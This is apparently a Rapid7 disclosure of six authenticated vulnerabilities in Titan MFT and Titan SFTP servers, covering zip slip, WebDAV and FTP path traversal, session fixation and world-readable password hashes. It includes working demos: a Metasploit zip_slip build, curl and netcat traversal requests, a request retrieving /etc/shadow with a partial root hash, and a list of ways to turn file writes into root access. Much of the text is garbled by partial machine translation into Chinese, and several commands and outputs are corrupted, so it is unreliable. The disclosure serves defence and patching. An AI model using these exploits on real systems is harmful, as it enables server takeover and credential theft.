最后更新于2023年12月27日(星期三)14:37:41 GMT

As part of our continuing research project into managed file transfer risk, including JSCAPE MFT and Fortra Globalscape EFT服务器, Rapid7 discovered several vulnerabilities in South River Technologies’ Titan MFT and Titan SFTP servers. Although these require unusual circumstances or non-default configurations, 以及一个有效的用户登录, 利用的后果可能导致远程超级用户访问受影响的主机.

Products

Titan MFT and Titan SFTP are business-grade Managed File Transfer (MFT) servers that provide enterprise-class, 高可用性故障转移和集群. 它们是非常相似的产品,具有相似的代码库, 尽管Titan MFT有一些额外的功能,如WebDAV.

We confirmed that these issues affect Titan MFT and Titan SFTP versions 2.0.16.2277 and 2.0.17.2298(根据供应商的说法,早期版本也会受到影响). 下面列出的所有问题都会影响Linux版本, 有些还会影响Windows版本(我们会注意哪些平台受到哪些问题的影响).

Discoverer

这些问题是由Rapid7的Ron Bowes发现的. They are being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Vendor Statement

南河科技致力于安全, 我们与有价值的研究人员合作, such as Rapid7, to respond to and resolve vulnerabilities on behalf of our customers.

Impact

Successful exploitation of several of these issues grants an attacker remote code execution as the root or SYSTEM user; however, 所有问题都是在身份验证后出现的,需要非默认配置,因此不太可能出现大规模利用.

Vulnerabilities

CVE-2023-45685: Authenticated Remote Code Execution via "zip slip"

Titan MFT和Titan SFTP有一个特性 .Zip文件可以在通过任何支持的协议上传时自动提取. Files within the .zip archive are not validated for path traversal characters; as a result, 通过身份验证的攻击者可以上传 .Zip文件,包含文件名如 ../../file,它将在用户的主目录之外提取. Linux和Windows服务器都会受到影响, but we will use Linux as an example of how this might be exploited.

If an attacker can write a file to anywhere on a Linux file system, 他们可以利用它以几种不同的方式获得对目标主机的远程访问:

  • Overwrite /root/.ssh/authorized_keys with an attacker's SSH key, allowing them to log in to an interactive session
  • Upload a script to /etc/cron.hourly 它将在将来的某个时刻执行代码
  • Upload a script to /etc/profile.d that will execute next time a user logs in to the Linux host
  • 覆盖系统二进制文件(例如 /bin/bash),并附带了一个后门版本

可以通过两种不同的方式缓解此漏洞:

  1. 这是一个非默认特性, so an administrator would have had to configure it before a server is vulnerable
  2. Exploitation requires a user to have an account with permission to upload files

Demo

所谓的“拉链滑漏”是一类常见的漏洞, 并且可以使用Metasploit模块创建一个示例文件(注意,这是一个通用模块,它写入包含可执行负载的ELF文件):

msf6 > use exploit/multi/fileformat/zip_slip
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp

msf6 exploit(multi/fileformat/zip_slip) > set FTYPE zip
FTYPE => zip

msf6 exploit(multi/fileformat/zip_slip) > set FILENAME test.zip
FILENAME => test.zip

msf6 exploit(multi/fileformat/zip_slip) > show options

msf6 exploit(multi/fileformat/zip_slip) > set TARGETPAYLOADPATH ../../../../../../../root/testzipslip
TARGETPAYLOADPATH => ../../../../../../../root/testzipslip

msf6 exploit(multi/fileformat/zip_slip) > exploit

[+] test.zip stored at /home/ron/.msf4/local/test.zip
[*]当被提取时,有效载荷将被提取为:
[*] ../../../../../../../root/testzipslip

然后用用户可以访问的任何协议(HTTP, FTP, WebDAV, SFTP)上传:

$ NCFTP -u 'testuser' -p 'b.0.0.68
NcFTP 3.2.5(2011年2月2日),作者Mike Gleason (http://www).NcFTP.com/contact/).
Connecting to 10.0.0.68...                                                                                          
TitanMFT 2.0.16.2277 Ready.
Logging in...                                                                                                       
Welcome testuser from 10.0.0.227. 现在您已登录到服务器.
Logged in to 10.0.0.68.                                                                                             
ncftp / > put ~/.msf4/local/test.zip
/home/ron/.msf4/local/test.邮政编码 :                        331年.00 B    7.92 kB/s  

And verify that it extracts outside of the user's home directory:

$ ssh root@10.0.0.68 ls /root
testzipslip

Note that the payload generated by Metasploit is an ELF file by default; however, using this technique, any file can be uploaded to any location on the file system.

CVE-2023-45686: Authenticated Remote Code Execution via WebDAV Path Traversal

The WebDAV handler does not validate the path specified by the user. That means that the user can write files outside of their home directory by adding ../ 字符到WebDAV URL. 成功的利用允许经过身份验证的攻击者将任意文件写入文件系统上的任何位置, 导致远程代码执行.

WebDAV默认不启用, so an administrator would have had to enable WebDAV for a target to be vulnerable. 这也不会影响Titan SFTP, which doesn't support the WebDAV protocol; additionally, as far as we can tell, 这只影响Linux版本的Titan MFT.

Demo

The curl utility with the PUT Verb可用于上传文件(请注意 --path-as-is is required, otherwise curl 将使路径正常化并删除 ../ portion of the URL):

$ curl -i -X PUT -u testuser:b --data-binary 'hi' --path-as-is http://10.0.0.68:8080/../../../../../../../../../root/testwebdav
HTTP/1.1 201 Created
Set-Cookie: SRTSessionId=NV7pXyEHw9bdkofCLp3dI5wMq96N7iLD; Path=/; Expires=2023-Sep-25 10:09:14 GMT; HttpOnly
Connection: close
Server: SRT WebDAV Server
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Accept-Ranges: bytes
ETag: "8F434346648F6B96DF89DDA901C5176B10A6D83961DD3C1AC88B59B2DC327AA4"

我们可以验证文件是从SSH会话中写入的:

$ ssh root@10.0.0.68 ls /root/
testwebdav

CVE-2023-45687: Session Fixation on Remote Administration Server

When an administrator authenticates to the remote administration server's API using an Authorization 头(HTTP基本或摘要身份验证)并设置一个 SRTSession header value to a value known by an attacker (including the literal string null), the session token is granted privileges that the attacker can use. 例如,下面的请求会使字符串"test"变成一个有效的会话令牌:

$ curl -u ron:myfakepassword -ik -H 'Srtsessionid: test' 'http://10.0.0.68:41443/WebApi/Process'

我们最初认为这是一种身份验证绕过, but later realized (from discussing it with the vendor) that the Srtsessionid 值必须在客户端和服务器上匹配, 而且让管理员设置任意标头的可能性非常低. This affects both the Linux and Windows versions of the software, 尽管Windows的漏洞利用路径与我们下面讨论的Linux路径不同.

If an attacker can 要么窃取会话令牌,要么欺骗管理员授权任意会话令牌, 可以使用管理访问权限将任意文件写入文件系统,步骤如下(在Linux上):

  • 创建一个具有任意主文件夹的新用户(例如, /root/.ssh)
  • Log in to one of the file-upload services, such as FTP, using that account
  • Upload a file, such a authorized_keys

Since the service runs as root, this lets an attacker upload or download any file. 我们实现了一个概念验证,演示了攻击者如何通过滥用管理员级访问在目标系统上实现远程代码执行.

CVE-2023-45688: Information Disclosure via Path Traversal on FTP

The SIZE command on FTP doesn't properly sanitize path traversal characters, which permits an authenticated user to get the size of any file on the file system. This requires an account that can log in via the FTP protocol, and appears to only affect the Linux versions of Titan MFT and Titan SFTP.

Demo

你可以用 netcat utility:

$ nc 10.0.0.69 21
220 TitanMFT 2.0.17.2298 Ready.
USER test 
用户名正确,需要输入密码.
PASS a
230 Welcome test from 10.0.0.227. 现在您已登录到服务器.
SIZE ../../../../../../../etc/shadow
213 1050
SIZE ../../../../../../../etc/hostname
213 7
SIZE ../../../../../../../etc/nosuchfile
没有这样的文件或目录

在这个示例中,攻击者可以确定这一点 /etc/shadow is 1050 bytes, /etc/hostname is 7 bytes, and /etc/nosuchfile doesn't exist.

CVE-2023-45689: Information Disclosure via Path Traversal in Admin Interface

Using the MxUtilFileAction 模型中,管理员可以从文件系统的任何位置检索和删除文件 ../ sequences in their path. Linux和Windows服务器都有此问题. 注意,管理员可以使用其他技术完全访问主机的文件系统, 所以这是一个很小的问题.

Demo

Note: This requires a valid session id (in the example below, 2427年a2dd-cbd6-4da3-b504-0fd0d3473beb):

$ curl -iks -H 'Content-Type: application/json' -H 'Srtsessionid: 2427年a2dd-cbd6-4da3-b504-0fd0d3473beb'——data-binary '[{"Model":"MxUtilFileAction",:“ServerGUID db2112ad - 0000 - 0000 - 0000 - 100000000001”,"Action":"l","Data":{"action":"d","fileList":["/var/southriver/srxserver/logs/Local Administration Server/../../../../../etc/shadow domainLogs“),真正的}}):“http://10.0.0.68:41443/WebApi/Process'
HTTP/2 200 
内容类型:应用程序/ x-msdownload
日期:2023年9月19日星期二21:02:07 GMT
content-length: 1155
strict-transport-security:信息= 2592000
Content-security-policy: base-uri 'self';
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
referrer-policy: origin
content-disposition: attachment; filename=shadow; filename*=UTF-8''shadow

根:$ 6 7 ooiic2ayta6p7lg mmvUvQYTSN美元/ E9DBfOOGldok6gd6iP8G7SeR20Va30JYCKPp14gzMhmOUrw3o0t6erwwemssYgjcDGqYI / jOWA0:19619:0:99999:7:::
[...]

CVE-2023-45690: Information Leak via World-Readable Database + Logs

Password hashes appear in world-readable files, including databases and log files. 对主机具有访问权限的非root帐户可以使用这些文件将其权限升级为root. Since shell access is required before this can be leveraged, 这个漏洞相当小, but we believe that local privilege escalation issues are still important to address.

You can use the strings utility to examine the database file as any user account (they can also be loaded in sqlite3):

ron@titan:~$ strings /var/southriver/srxserver/database/srxdbDB2112AD555500000000100000000001.db | grep -o '"PasswordHash":"[^"]*"'
“PasswordHash”:“5267768822 ee624d48fce15ec5ca79cbd602cb7f4c2157a516556991f22ef8c7b5ef7b18d1ff41c59370efb0858651d44a936c11b7b144c48fe04df3c6a3e8da”
“PasswordHash”:“72 a8d535781681a613d4f8ed06192020afda3b1b6c3c48a392ffab2df033d23f791bb6ccbe3b134b4a721bfe1cfe6cd06581ca74eaaee5343ccd70dc3115f984”
:“PasswordHash 57 e38b3a0621901ec5c64fa1864a5d16e17ce4ddf9cd084e4e72d0eeec2d270353d033c972e5b5c646422b56f7eaa11fd54baac0a19f6a20cc8d93df6063db30”

还可以导出日志 journalctl as any user:

ron@titan2:~$ journalctl -u titanmft.Service | grep 'stored hash'
Sep 26 22:28:36 titan2 srxserver[3526]: 2023-09-26 22:28:36 [Info/-/007]根据存储的散列[7632AC9FECE0727899598E82E1601669F76D1D2AB75F33AE6A57D21060E22DB93E9D267155909E7EC5EECA20382A18D5D246A4CCAF64466D16974124BA0EC22F]验证传入用户,结果为True
Sep 26 22:34:02 titan2 srxserver[3526]: 2023-09-26 22:34:02 [Info/-/065]根据存储的散列[1f40fc92da241694750979ee6cf582f2d5d7d28e18335de05abc54d0560e0f5302860c652bf08d560252aa5e74210546fbbbce8c12cfc7957b2652fe9a75]验证传入用户,结果为True
Sep 26 22:34:15 titan2 srxserver[3526]: 2023-09-26 22:34:15 [Info/-/065]根据存储的散列[1f40fc92da241694750979ee6cf582f2d5d7d28e18335de05abc54d0560e0f5302860c652bf08d560252aa5e74210546fbbbce8c12cfc7957b2652fe9a75]验证传入用户,结果为True
Sep 26 22:34:48 titan2 srxserver[3526]: 2023-09-26 22:34:48 [Info/-/061]根据存储的散列[1f40fc92da241694750979ee6cf582f2d5d7d28e18335de05abc54d0560e0f5302860c652bf08d560252aa5e74210546fbbbce8c12cfc7957b2652fe9a75]验证传入用户,结果为True

Mitigation Guidance

根据南河科技的说法,本披露的问题可以通过应用来补救 vendor-supplied patches to upgrade to version 2.0.18的Titan SFTP或Titan MFT. Additionally, 这些问题可以通过配置Titan SFTP或Titan MFT服务而不是在本地系统帐户下运行,而是使用具有有限特权的特定Windows或Linux用户帐户来缓解.

Timeline

  • 2023年9月- Rapid7发现漏洞
  • September 28, 2023 - Rapid7 finds a security contact and reports the issues
  • 2023年9月28日-供应商认可我们的报告
  • September 30, 2023 - Vendor let us know that the majority of the issues are resolved
  • October 11, 2023 - Discussed and agreed on a disclosure date of October 16, 2023
  • 2023年10月16日-此协调披露(包括本博客和所有供应商工件)